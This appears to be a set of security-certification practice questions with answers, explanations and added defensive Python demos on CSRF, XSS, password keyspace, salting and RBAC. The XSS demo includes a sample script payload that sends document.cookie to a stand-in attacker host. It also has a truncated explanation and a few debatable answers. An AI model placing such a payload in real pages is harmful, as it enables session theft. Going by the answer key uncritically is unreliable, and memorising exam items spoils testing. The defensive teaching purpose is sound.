pivot Pivot attacks use a compromised system to attack another system. The first system is compromised in the initial exploit. That first system is then used as a foothold to reach and attack other systems on the same network, ones that were not directly reachable from the outside. Initial exploitation refers to compromising a non-target system so that it can be used in a pivot against another system that is the true target. Answer A is incorrect. Active reconnaissance accesses the system directly to detect vulnerabilities. It uses tools and techniques such as network mapping, port scans, and network sniffing to test the system and identify potential sources of attack. Answer D is incorrect. Passive reconnaissance detects vulnerabilities in a network without touching it directly, through techniques such as social engineering, accessing supposedly confidential information in publicly available databases, dumpster diving, and shoulder surfing. Answer C is incorrect. Persistence is maintaining access to the compromised system so that it can be used in an attack at some point after the initial exploitation occurred. An example of persistence would be when a student's notebook computer contracts malware at a coffee shop, but the school network is not affected until the student later logs in to the school network.

Which two alternate data center facilities are the easiest to test?

redundant hot site The hot site and the redundant site are the easiest to test because they both contain all of the alternate computer and telecommunication equipment needed in a disaster. Usually, testing either of these environments is as simple as switching over to them after ensuring they contain the latest versions of your data. Answer D is incorrect. A warm site is harder to test than a hot site or a redundant site, but easier to test than a cold site. It only contains telecommunications equipment. Therefore, to properly test disaster recovery procedures at the warm site, alternate computer equipment such as servers would need to be set up and configured. Answer A is incorrect. A cold site is the hardest to test. It only includes a basic room with raised flooring, electrical wiring, air conditioning, and telecommunications lines. To properly test disaster recovery procedures at the cold site, alternate telecommunications and computer equipment would need to be set up and configured. Hot sites and redundant sites are usually the most expensive to implement. Warm sites are less expensive than hot sites but more expensive than cold sites. Cold sites are the least expensive to implement.

What are some disadvantages to using a cold site?

testing availability recovery time Cold sites take a long time to bring online for disaster recovery. They also are not as available for testing as other alternatives. Therefore, recovery time and testing availability are two disadvantages to using a cold site. Cold sites are inexpensive. Cold sites require no daily administration time. Therefore, expense and administration time are two advantages to using a cold site. Cold sites are locations that meet the requirements for power and connectivity only. Hot sites are expensive. They require a lot of administration time to ensure that the site is ready within the maximum tolerable downtime (MTD). Therefore, expense and administration time are two disadvantages to using a hot site. Another disadvantage of a hot site is that it needs extensive security controls. Hot sites are available within the MTD and are available for testing. Therefore, recovery time and testing availability are two advantages to using a hot site. Warm sites are less expensive than hot sites, but more expensive than cold sites. The recovery time of a warm site is slower than for a hot site, but faster than for a cold site. Warm sites usually require less administration time because the computer equipment is not kept configured and loaded with current data; typically only the telecommunications links and basic hardware are maintained. Warm sites are easier to test than cold sites, but harder to test than hot sites. Hot, cold, and warm sites are maintained in facilities that are owned by another company. Hot sites generally contain everything you need to bring your IT facilities up. Warm sites provide some capabilities, including computer systems and media capabilities, in the event of a disaster. Cold sites do not provide any infrastructure to support a company's operations and require the most setup time. Redundant sites are expensive and require a lot of administration time. Redundant sites are hot sites, but not all hot sites are redundant sites. Redundant sites are usually maintained by a company for itself.
Hot sites are maintained by a company for another company. Redundant sites require a small recovery time and are easier to test than the facilities owned by other companies.

What is DNS poisoning?

the practice of dispensing IP addresses and host names with the goal of traffic diversion DNS poisoning is the practice of dispensing false IP address-to-host name mappings with the goal of traffic diversion: the attacker inserts forged records into a resolver's cache (or into a zone) so that a legitimate name resolves to an address the attacker controls. Properly configured DNS Security Extensions (DNSSEC) let a validating resolver verify the signatures on DNS records, which rejects forged responses and so prevents cache poisoning. Answer C is incorrect. A SYN flood is the practice of continually sending a server TCP SYN packets, usually with spoofed source addresses, so that a high number of half-open connections are established to a single computer; it exhausts the connection table rather than altering name resolution. Answer B is incorrect. A DNS denial-of-service (DoS) attack is the practice of one computer transmitting malformed packets (or an overwhelming volume of queries) to the DNS server to cause the server to crash or become unresponsive. A DNS distributed DoS (DDoS) attack is the same thing carried out from many computers. Answer A is incorrect. ARP poisoning is similar to DNS poisoning but works at layer 2. In this attack, a malicious actor sends falsified ARP messages over a local area network to map the attacker's MAC address to another host's IP address. In a domain hijacking attack, the registration of a domain name is changed without the permission of the original registrant.

What is cross-site request forgery (XSRF)?

when unauthorized commands are executed on a Web server by a trusted user Cross-site request forgery (XSRF, also written CSRF) occurs when unauthorized commands are executed on a Web server by a trusted user: the attacker tricks the victim's browser (for example, through a hidden form or image tag on another site) into sending a request that the server accepts because the browser automatically attaches the victim's session cookie. Defenses include per-session anti-forgery tokens that an attacker's page cannot read, and the SameSite cookie attribute. Answer D is incorrect. Fuzzing occurs when unexpected or malformed values are provided as input to an application to make the application crash or misbehave. Answer A is incorrect. Cross-site scripting (XSS) occurs when attacker-supplied script is injected into a Web page and executes in other users' browsers with that site's privileges; XSS attacks the user, whereas XSRF abuses the user's existing trust. Answer B is incorrect. Footprinting occurs when network data is gathered to discover ways to intrude on the network.
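As an added example (not code from the original page), a minimal Python request handler shows a forged cross-site request succeeding against an endpoint that trusts the session cookie alone, and the same endpoint protected with a synchronizer token bound to the session. The session IDs, request dictionaries and server key are constructed for the demo; real frameworks generate and check the token for you, but the mechanism is the same.

```python
"""Added example (not from the original page): cross-site request
forgery against an unprotected endpoint, and a session-bound
synchronizer token that blocks it. All inputs are constructed."""
import hashlib
import hmac
import secrets

# Assumed: a per-deployment secret loaded from configuration.
# Generated at import time here so the demo is self-contained.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Token the server embeds in its own forms. It is derived from the
    session, so a token from another session is useless, and another
    origin cannot read it (the same-origin policy keeps page content private)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_unprotected(request, session_id):
    """Vulnerable: the browser attached the victim's cookie, so the server
    believes the request came from the user and acts on it."""
    if session_id is None:
        return "401 not logged in"
    return f"200 transferred {request['amount']} to {request['to']}"


def transfer_protected(request, session_id):
    """Fixed: the request must also carry the token that only a page
    served to this session could have contained."""
    if session_id is None:
        return "401 not logged in"
    token = request.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token_for(session_id)):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {request['amount']} to {request['to']}"


def main():
    victim_session = "sess-7f3a"  # cookie the browser sends automatically
    # A hidden form on the attacker's site posts this; it cannot carry a valid token.
    forged = {"to": "mallory", "amount": 1000}
    # The bank's own form includes the token rendered for the victim's session.
    legitimate = {"to": "landlord", "amount": 800,
                  "csrf_token": csrf_token_for(victim_session)}
    print("unprotected, forged:  ", transfer_unprotected(forged, victim_session))
    print("protected, forged:    ", transfer_protected(forged, victim_session))
    print("protected, legitimate:", transfer_protected(legitimate, victim_session))


if __name__ == "__main__":
    main()
```

The token check only works because the session cookie is sent automatically while the token is not: the attacker's page can trigger the request but cannot see the token to include it.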

Your organization uses a SOHO wireless router all-in-one device. The network has five wireless BYOD users and two web servers that are wired to the network. What should you configure to protect the servers from the BYOD users' devices? (Select the two best answers.)

Create a VLAN for the servers Create an ACL to access the servers If the servers and the BYOD users are on the same network, then the BYOD users could easily access the servers, regardless of whether a computer is connected in a wired fashion or wireless fashion by default. So to protect the servers from the users' mobile devices, you could first create a virtual LAN (VLAN) for the servers. This VLAN would separate the servers and you could then control who is allowed access to the servers via access control lists (ACLs) within the firewall portion of the SOHO all-in-one wireless router. If the SOHO router supported it, you could also place the web servers in a DMZ. The EAP-TLS authentication scheme should not be necessary for this scenario; it is used, for example, to authenticate wireless clients to a wireless network, which was not specified in the question. Changing the default HTTP port (which is normally 80) would cause your Internet guests some difficulty in finding the web servers, and is not necessary in this scenario either. Denying incoming connections to the outside router interface would also make it difficult for Internet users to access the web servers, and is therefore not recommended. If a physical port is disabled, anything connected to that port will be effectively offline. This also compounds the issue instead of solving it.

You are the systems administrator for your organization. You have been tasked to block database ports at the firewall. Which port should you block?

1433 Port 1433 (TCP) is the default listener for Microsoft SQL Server and should be blocked at the firewall if you want to block SQL Server activity. Note that the SQL Server Browser service uses UDP 1434 and that named instances can be configured to listen on other ports, so confirm the ports actually in use on the server rather than trusting the default. Port 3389 is used by the Remote Desktop Protocol. Port 443 is used by HTTPS. Port 53 is used by DNS.

You have been asked to choose a hashing algorithm for your organization. You decide to implement SHA-1. Which size checksum is produced by this algorithm?

160-bit Secure Hash Algorithm 1 (SHA-1) produces a 160-bit digest (often loosely called a checksum). SHA-256 is a member of the SHA-2 family (which also includes SHA-224, SHA-384, and SHA-512) and produces a 256-bit digest. SHA-1 is no longer collision resistant (practical collisions were demonstrated in 2017), so it should not be chosen for new integrity or signature work; SHA-256 is the usual choice for hashing a disk image so that the image's integrity can be demonstrated later for forensic purposes. MD5 produces 128-bit digests and is likewise collision-broken. Data Encryption Standard (DES) uses 56-bit encryption keys. Advanced Encryption Standard (AES) uses 128-bit, 192-bit, or 256-bit encryption keys.

A user complains that he is unable to communicate with a remote virtual private network (VPN) using L2TP. You discover that the port this protocol uses is blocked on the routers in your network. You need to open this port to ensure proper communication. Which port number should you open?

1701 You should open port 1701 because this is the UDP port used by Layer 2 Tunneling Protocol (L2TP). When L2TP is carried inside IPsec, as is usual, the firewall must also pass IKE on UDP 500, NAT traversal on UDP 4500, and ESP (IP protocol 50). Port 22 is reserved for Secure Shell (SSH) remote login. Port 88 is assigned to the Kerberos protocol. Point-to-Point Tunneling Protocol (PPTP) uses TCP port 1723 for its control connection and carries the tunneled traffic in GRE (IP protocol 47), not UDP. There are 65,536 port numbers (0 through 65,535) for each of TCP and UDP, and every port that is open and listening is a potential point of attack. You should know the following commonly used ports and protocols:
FTP - ports 20 (data) and 21 (control)
SSH, SCP, and SFTP - port 22
Telnet - port 23
SMTP - port 25
TACACS/TACACS+ - port 49
DNS - port 53
DHCP - ports 67 (server) and 68 (client)
TFTP - port 69 (UDP)
HTTP - port 80
Kerberos - port 88
POP3 - port 110
NetBIOS - ports 137-139
IMAP4 - port 143
SNMP - port 161 (UDP)
LDAP - port 389
HTTPS (HTTP over TLS/SSL) - port 443
SMB - port 445
LDAP over TLS/SSL (LDAPS) - port 636
FTPS - ports 989 (data) and 990 (control)
Microsoft SQL Server - port 1433
L2TP - port 1701 (UDP)
PPTP - port 1723 (TCP)
RDP and Terminal Services - port 3389

A server is located on a DMZ segment. The server only provides FTP service, and there are no other computers on the DMZ segment. You need to configure the DMZ to ensure that communication can occur. Which port should be opened on the Internet side of the DMZ firewall?

20 FTP uses ports 20 and 21 by default, and of the options listed (20, 80, 110, 443) port 20 is the only FTP port, so it is the expected answer. In practice, be careful: a client opens the FTP control connection to TCP port 21, so port 21 must be permitted inbound for any FTP session to start at all. Port 20 is the source port the server uses for active-mode data connections that it initiates back to the client; in passive mode the server instead listens on a high port range that the firewall must also permit. Only necessary ports should be opened on the Internet side of a demilitarized zone (DMZ) firewall in order to limit what an attacker can reach on the internal network, and because plain FTP sends credentials and data in clear text, SFTP or FTPS is preferred where possible. Answers B, C, and D are incorrect. Port 80 is used by Hypertext Transfer Protocol (HTTP) to transfer web pages. Port 110 is used by the Post Office Protocol (POP3), and port 443 is used by HTTPS (HTTP over TLS/SSL). Access control lists (ACLs) are used to configure rules on network devices. These ACLs determine which communication is allowed or denied, and can be based on port numbers, IP addresses, MAC addresses, and other criteria.

Which of the following equations represents the complexity of a password policy that enforces a lowercase password using the letters a through z, where "n" is the password length?

26^n The 26 refers to the 26 lowercase letters a through z, and the exponent n is the password length. To count the possible passwords (the keyspace), raise the number of allowed characters to the power of the password length. If the policy in this example required a password eight characters long, the keyspace would be 26 to the power of 8, or 208,827,064,576. Here n = 8, but it could be 10, 14, or whatever length the security administrator sets in the password policy. Each additional character multiplies the keyspace by 26, whereas allowing more character classes (uppercase, digits, symbols) raises the base instead.
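
As an added example (not from the original question set), the following Python carries the 26^n calculation through for arbitrary character classes and also computes the cumulative keyspace an attacker actually searches, the equivalent entropy in bits, and the worst-case time to exhaust the space at a given guess rate. The class sizes and the one-billion-guesses-per-second rate are assumptions for illustration.

```python
import math
from typing import Dict

# Assumed character-class sizes (printable ASCII); adjust to your policy
CLASSES: Dict[str, int] = {
    "lower": 26,    # a-z
    "upper": 26,    # A-Z
    "digit": 10,    # 0-9
    "symbol": 33,   # space and ASCII punctuation
}


def policy_alphabet(*classes: str) -> int:
    """Size of the alphabet a policy allows, e.g. policy_alphabet('lower', 'digit') -> 36."""
    return sum(CLASSES[c] for c in classes)


def keyspace(alphabet_size: int, length: int) -> int:
    """Distinct passwords of exactly `length` characters: alphabet ** length."""
    return alphabet_size ** length


def keyspace_up_to(alphabet_size: int, max_length: int) -> int:
    """Passwords of length 1..max_length: what an attacker really searches,
    since shorter candidates are tried first."""
    return sum(alphabet_size ** n for n in range(1, max_length + 1))


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Equivalent strength in bits, assuming every character is chosen uniformly."""
    return length * math.log2(alphabet_size)


def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every password of this length at the given rate."""
    seconds = keyspace(alphabet_size, length) / guesses_per_second
    return seconds / (365 * 24 * 3600)


if __name__ == "__main__":
    rate = 1e9  # assumed offline cracking rate: one billion hashes per second
    for policy, length in ((("lower",), 8),
                           (("lower", "upper", "digit"), 8),
                           (("lower", "upper", "digit", "symbol"), 14)):
        n = policy_alphabet(*policy)
        print(f"{'+'.join(policy):>24} x{length}: {keyspace(n, length):.3e} candidates, "
              f"{entropy_bits(n, length):.1f} bits, "
              f"{years_to_exhaust(n, length, rate):.2e} years to exhaust")
```

The lowercase eight-character space falls in minutes at that rate; the point of the calculation is that length is the exponent, so it buys far more than adding a class does.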

Root of Trust (RoT)

A set of code and functions, usually embedded in a trusted platform module (TPM) or other hardware, that is trusted unconditionally because it cannot be modified, and on which later security decisions such as allowing or denying booting and drive encryption are built.

APT Advanced Persistent Threat

A set of computer-attacking processes that targets private organizations or nation states. Also refers to a group (often a government) that persistently targets a specific entity.

back-to-back perimeter

A DMZ design that places the DMZ between two firewalls, one facing the Internet and one facing the LAN, so that traffic from the Internet must pass both firewalls to reach the internal network.

In which situation does cross-site scripting (XSS) pose the most danger?

A user accesses a financial organization's site using his or her login credentials. Cross-site scripting (XSS) poses the most danger when a user accesses a financial organization's site using his or her login credentials. The problem is not that the attacker takes over the server; it is that script running in the victim's browser can take over the client's session, read the session cookie or act on the user's behalf, and so obtain information about the legitimate user that is not publicly available. To prevent XSS, a developer should validate input and, above all, encode output for the context in which it is placed (HTML body, attribute, JavaScript, URL), so that user-supplied text is never interpreted as markup or script. Answers A, D, and C are incorrect. While the other situations can also result in an XSS attack, they pose less danger because it is unlikely that any valuable real-world information would be obtained. There are different steps organizations and security professionals can take to protect against XSS attacks. Regular users should restrict untrusted JavaScript, use the browser's built-in protections, restrict external web sites from requesting internal resources, and keep systems updated and patched. Developers should use allowlisting (preferred) or denylisting of input, libraries such as the OWASP Enterprise Security API (ESAPI) and the Microsoft AntiXSS Library, and web vulnerability scanners. Network administrators can use filtering web proxies (for example, the WhiteTrash plug-in for Squid) and web application firewalls (WAFs). Finally, a content security policy (CSP) lets the web application tell the browser which script sources are allowed, separating user-supplied data from the application's own HTML and script.
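
The session-hijack risk described above comes from untrusted text being written into the page as markup. As an added example (not code from the original page), this Python shows a vulnerable rendering function beside its hardened form, plus a Content Security Policy header of the kind the answer mentions. The attacker payloads, the `attacker.example` host and the nonce handling are constructed for the demo.

```python
import html
import secrets
from typing import Dict

# Constructed attacker inputs for the demo (hostname is a placeholder)
REFLECTED_XSS = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"
ATTRIBUTE_XSS = '" onmouseover="alert(document.cookie)'


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: user input concatenated straight into HTML body and attribute context."""
    return f'<p>Welcome, {name}</p><input name="who" value="{name}">'


def render_greeting_safe(name: str) -> str:
    """Hardened: encode for the HTML context. quote=True also turns " and ' into
    entities so the value cannot close the attribute and add an event handler."""
    enc = html.escape(name, quote=True)
    return f'<p>Welcome, {enc}</p><input name="who" value="{enc}">'


def csp_headers(nonce: str) -> Dict[str, str]:
    """Defense in depth: a policy that runs only scripts carrying this response's nonce,
    which blocks injected inline scripts and inline event handlers even if encoding slips."""
    policy = (
        "default-src 'self'; "
        f"script-src 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
    )
    return {"Content-Security-Policy": policy}


def new_nonce() -> str:
    """Fresh per-response nonce; reusing one across responses defeats the purpose."""
    return secrets.token_urlsafe(16)


def injection_survived(rendered: str) -> bool:
    """Demo check only: did a raw <script> tag or an injected event attribute reach the output?"""
    return "<script" in rendered or ' onmouseover="' in rendered


if __name__ == "__main__":
    for payload in (REFLECTED_XSS, ATTRIBUTE_XSS):
        print("unsafe:", render_greeting_unsafe(payload))
        print("safe:  ", render_greeting_safe(payload))
    print(csp_headers(new_nonce()))
```

Encoding must match the output context: `html.escape` is right for HTML body and quoted attributes, but data placed inside a script block or a URL needs JavaScript or URL encoding instead.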

You need to implement voice over IP (VoIP) and wireless services for your company. Which AAA implementation was created to deal with these?

Diameter Diameter was created to deal with Voice over IP (VoIP) and wireless services. It was designed to address new technologies that RADIUS was not built to handle. Diameter is not backwards compatible with RADIUS, although it was designed with a migration path from it, so gateways are needed for the two to interoperate. Diameter runs over TCP or SCTP, is protected with TLS or IPsec, and can carry EAP, thereby providing better security than RADIUS. Answers C, D, and A are incorrect. Terminal Access Controller Access Control System (TACACS) is an older AAA protocol family, not an implementation of RADIUS. TACACS is the first generation and combines the authentication and auditing processes. XTACACS is the second generation and separates the authentication, authorization, and auditing processes. TACACS+ is Cisco's third generation and a separate protocol; it provides all of the features of XTACACS, supports multi-factor authentication through multiple challenge-response exchanges, and encrypts the entire packet body, whereas RADIUS obscures only the password. Kerberos is a ticket-based authentication protocol that never sends the user's password over the network, which is why it is considered more secure than RADIUS, TACACS, or a plain LDAP bind. Another authentication service that you need to be familiar with is Security Assertion Markup Language (SAML), which is an XML-based data format for exchanging authentication and authorization data between an identity provider and a service provider.

Your organization's server uses a public, unencrypted communication channel. You are required to implement protocols that allow clients to securely negotiate encryption keys with the server. What protocols should you select? (Select the two best answers.)

Diffie-Hellman ECDHE Finite-field Diffie-Hellman and ECDHE (Elliptic Curve Diffie-Hellman in ephemeral mode) are key agreement protocols designed to let two parties negotiate a shared secret over an unencrypted channel without ever transmitting that secret. On their own they do not authenticate the parties, so in practice they are combined with certificates or signatures (as in TLS) to defeat a man-in-the-middle who runs a separate exchange with each side. PBKDF2 is a key derivation function used for key stretching; it turns a weak secret such as a password into a stronger key by iterating a hash, but it does not negotiate anything with a peer. Steganography is the art of hiding messages, for example within pictures or photographs. Symmetric encryption is not used in this scenario. Both answers (and other solutions) will be asymmetric metho

Which cryptographic technique changes multiple output bits when you change a single input bit?

Diffusion Diffusion is the cryptographic property whereby a change of a single input bit results in a change of many output bits, ideally about half of them (the avalanche effect). Answer D is incorrect. Confusion is the property whereby the relationship between the components of the message (the plaintext, the key used, and the ciphertext) is made difficult to see. By contrast, with ROT13 each output letter depends on exactly one input letter and the relationship is obvious. Answer C is incorrect. Salting is a countermeasure against rainbow table attacks. With salting, a random value (the salt) is combined with the password before it is hashed and is stored alongside the hash, so the same password produces a different hash for every user. In the example given here, the password "OpenSesame" is stored as the hash of something like "Open00Salt99"; a rainbow table built from hashes of bare passwords will not contain that value. Answer B is incorrect. An initialization vector (IV) is a per-message value, supplied alongside the key, that makes the encryption of identical plaintexts produce different ciphertexts; it should never repeat under the same key, which is why it is often a nonce (number used once). Wired Equivalent Privacy (WEP) shows what happens when the IV is too small: its 24-bit IV is prepended to the RC4 key, and the 16.7 million possible values are reused quickly on a busy network, which is one reason WEP is considered broken. Weak or deprecated algorithms such as WEP, RC4, and Data Encryption Standard (DES) are to be avoided.
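
An added example (not from the original) that measures the avalanche effect of SHA-256 against the absence of diffusion in ROT13, and implements the salting countermeasure with a random per-user salt and PBKDF2 key stretching. The iteration count is an assumed demo value.

```python
import hashlib
import secrets
from typing import Optional, Tuple


def hamming_distance(a: bytes, b: bytes) -> int:
    """Count the bits that differ between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(message: bytes, bit_index: int, algo: str = "sha256") -> int:
    """Flip one input bit and return how many digest bits change.
    Good diffusion changes roughly half of them (about 128 of SHA-256's 256)."""
    flipped = bytearray(message)
    flipped[bit_index // 8] ^= 1 << (bit_index % 8)
    return hamming_distance(hashlib.new(algo, message).digest(),
                            hashlib.new(algo, bytes(flipped)).digest())


def rot13(text: str) -> str:
    """No diffusion and no confusion: each output letter depends on one input letter."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def changed_chars(a: str, b: str) -> int:
    """Positions at which two equal-length strings differ."""
    return sum(x != y for x, y in zip(a, b))


# Salting plus key stretching. ITERATIONS is an assumed demo value; raise it
# until one verification takes tens of milliseconds on your hardware.
ITERATIONS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random 16-byte salt is drawn unless one is given."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return secrets.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("SHA-256 bits changed by one flipped input bit:", avalanche(b"OpenSesame", 3))
    print("ROT13 chars changed by one changed input char:",
          changed_chars(rot13("OpenSesame"), rot13("OpenSesamf")))
    s1, h1 = hash_password("OpenSesame")
    s2, h2 = hash_password("OpenSesame")
    print("same password, different salts, same hash?", h1 == h2)
```

Two users with the same password get different digests, so a precomputed table of unsalted hashes is useless, and the iteration count makes each guess in an offline attack proportionally more expensive.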

An administrator wants to reduce the size of the attack surface of a Windows Server. Which of the following is the best answer to accomplish this

Disable unnecessary services Often, operating system manufacturers such as Microsoft refer to the attack surface as all the services that run on the operating system. By conducting an analysis of which services are necessary and which are unnecessary, an administrator can find out which ones need to be disabled, thereby reducing the attack surface. Updates, service packs, antivirus software, and network intrusion detection systems (NIDSs) are good tools to use to secure an individual computer and the network but do not help to reduce the size of the attack surface of the operating system.

Which one of these is NOT characterized by identifying or exploiting a vulnerability when found?

Discovering a false positive Discovering a false positive is NOT characterized by identifying or exploiting a vulnerability when found. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability. Answer D is incorrect. When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Answer A is incorrect. When you attempt to identify common misconfigurations, you are looking for out-of-the-box settings that were not configured before being placed in service in the network, like a router that still has the default administrative password. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls.Answer B is incorrect. When you scan to identify lack of security controls, you are looking for things like appropriate access controls, authentication controls, input validation, and proper logging, among others.

Management has asked you to implement an encryption algorithm that is based on the Diffie-Hellman key agreement. Which encryption algorithm should you implement?

ElGamal ElGamal is an asymmetric public key encryption algorithm based on the Diffie-Hellman key agreement. It is used for digital signatures, encryption of data, and key exchange. The mathematics of ElGamal rely on the difficulty of computing discrete logarithms in a finite field. Diffie-Hellman was one of the first public/private key systems. Answer D is incorrect. HAVAL is a hashing algorithm, not an encryption algorithm. It processes 1024-bit blocks of input and creates message digests of variable size rather than a fixed output: 128, 160, 192, 224, or 256 bits. Answer C is incorrect. Knapsack (Merkle-Hellman) is an asymmetric encryption algorithm that is not based on the Diffie-Hellman key agreement; it was broken in the early 1980s and is of historical interest only. Answer B is incorrect. International Data Encryption Algorithm (IDEA) is a symmetric block cipher that operates on 64-bit blocks of data, uses a 128-bit key, and performs eight rounds of computation followed by an output transformation. The Pretty Good Privacy (PGP) encryption software has used IDEA.

What is the goal when you passively test security controls?

Probing for weaknesses When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Answers B, C, and D are incorrect. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls. These misconfigurations or a lack of controls can lead to exploiting the identified weakness, interfere with business operations, and cause infiltration of the network. When you scan to identify lack of security controls, you are looking for the presence or absence of appropriate access controls, authentication controls, input validation, and proper logging practices, among other security controls. When you attempt to identify common misconfigurations, you are looking for things like a router or wireless access point that still has the default administrative password. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

Which of the following solutions should be used by heavily utilized networks?

Provider cloud Provider clouds can offer Infrastructure as a Service (IaaS), which can alleviate some of the stress an organization's network might suffer from. In addition, provider clouds can offer software (SaaS) and platforms (PaaS). VPN concentrators and remote access are not good choices for heavily utilized networks. They are meant for smaller groups of remote users. Telephony is not a solution for heavily utilized networks. It is quite the opposite; often networks are the solution for telephony usage.

As a security professional, you have been asked to advise an organization on which access control model to use. You decide that role-based access control (RBAC) is the best option for the organization. What are two advantages of implementing this access control model?

RBAC low security cost easier to implement Role-based access control (RBAC) has a low security cost because permissions are configured per role rather than per user. For this reason, it is also easier to implement than the other access control models. During the information gathering stage of deploying an RBAC model, you will most likely need a matrix of job titles with their required access privileges. Answers C, D, and E are incorrect. RBAC is NOT the most user-friendly option. Discretionary access control (DAC) is more user friendly than RBAC because it allows the data owner to determine user access rights; if a user needs access to a file, he only needs to contact the file owner. RBAC is NOT discretionary in nature. DAC is discretionary, meaning access to objects is determined at the discretion of the owner. RBAC is NOT a highly secure environment. Mandatory access control (MAC) is considered a highly secure environment because every subject and object is assigned a security label. With RBAC, it is easy to enforce least privilege for general users: create the appropriate role, configure its permissions, and then add the users to the role. A role is defined by the operations and tasks it should be granted. Roles are based on the structure of the organization and are usually hierarchical, with a senior role inheriting the permissions of the roles beneath it. RBAC is a popular access control model in commercial applications, especially large networked applications. Rule-based access control is often confused with RBAC because the names are similar. With rule-based access control, access to resources is decided by a set of rules (firewall ACL entries, for example), and the user receives the permissions of the first rule he matches.
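
An added example (not from the original) showing the role hierarchy and least-privilege points above in code: a minimal RBAC policy with role inheritance, a default-deny authorization check per request, and a static separation-of-duty check. The roles, users and permissions are constructed for the demo.

```python
from typing import Dict, Optional, Set, Tuple

Permission = Tuple[str, str]  # (action, resource)

# Constructed role model for the demo; names are hypothetical
ROLE_PERMISSIONS: Dict[str, Set[Permission]] = {
    "employee": {("read", "handbook")},
    "accountant": {("read", "ledger"), ("write", "ledger")},
    "auditor": {("read", "ledger"), ("read", "audit-log")},
    "finance-manager": {("approve", "payment")},
}

# Role hierarchy: a role inherits everything its parent roles grant
ROLE_PARENTS: Dict[str, Set[str]] = {
    "accountant": {"employee"},
    "auditor": {"employee"},
    "finance-manager": {"accountant"},
}

USER_ROLES: Dict[str, Set[str]] = {
    "alice": {"finance-manager"},
    "bob": {"auditor"},
    "carol": {"employee"},
}


def effective_roles(role: str, seen: Optional[Set[str]] = None) -> Set[str]:
    """The role itself plus every ancestor, following ROLE_PARENTS (cycle-safe)."""
    seen = set() if seen is None else seen
    if role not in seen:
        seen.add(role)
        for parent in ROLE_PARENTS.get(role, set()):
            effective_roles(parent, seen)
    return seen


def permissions_for_user(user: str) -> Set[Permission]:
    """Union of the permissions of all roles, direct and inherited, held by the user."""
    perms: Set[Permission] = set()
    for role in USER_ROLES.get(user, set()):
        for r in effective_roles(role):
            perms |= ROLE_PERMISSIONS.get(r, set())
    return perms


def is_authorized(user: str, action: str, resource: str) -> bool:
    """Per-request check: default deny unless some role grants the exact permission."""
    return (action, resource) in permissions_for_user(user)


def violates_separation_of_duty(user: str) -> bool:
    """Static SoD rule for the demo: nobody may both write the ledger and read the audit log."""
    perms = permissions_for_user(user)
    return ("write", "ledger") in perms and ("read", "audit-log") in perms


if __name__ == "__main__":
    for user, action, resource in (("alice", "approve", "payment"),
                                   ("alice", "read", "handbook"),
                                   ("bob", "write", "ledger"),
                                   ("carol", "read", "ledger"),
                                   ("dave", "read", "handbook")):
        verdict = "ALLOW" if is_authorized(user, action, resource) else "DENY"
        print(f"{user:6} {action:8} {resource:10} -> {verdict}")
```

Adding a user means assigning a role, not editing permissions, which is where the low administrative cost comes from; the separation-of-duty check is what keeps that convenience from quietly accumulating conflicting roles on one person.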

A critical system in the server room was never connected to a UPS. The security administrator for your organization has initiated an authorized service interruption of the server to fix the problem. Which of the following best describes this scenario?

Fault tolerance Because the security administrator is deliberately interrupting service in a proactive effort to fix the problem, this scenario would be best described as fault tolerance. Also, the fact that a UPS is being installed to make the system tolerant of power loss lends to the fault tolerance answer. If the administrator was planning how to implement a new server, then it would be succession planning. Continuity of operations and disaster recovery deal with the scenario of an actual disaster and the planning for recovery from that disaster.

Your boss has tasked you with ensuring that reclaimed space on a hard drive has been sanitized while the computer is in use. What job should you perform?

Cluster tip wiping A cluster tip is the last portion of a hard drive's cluster that is not used by a file. Often, files take up more than a single cluster. The cluster remainders don't get erased by default, but could possibly contain data remanence. So, some disk cleanup programs contain an option to wipe the cluster tips, thus better sanitizing the drive. This can even be performed while the computer is in use.Encryption of any type does not sanitize the drive. Storage retention and data retention usually manifest themselves as policies. For example, an organization might have a storage retention policy that states a hard drive must be kept in storage for a minimum of three years before being fully sanitized and/or destroyed. This is common in high-security environments where data is extremely confidential, or where auditing and other logging information must be kept for a specific amount of time.

Which of the following reduces the chances of a single point of failure on a server when it fails?

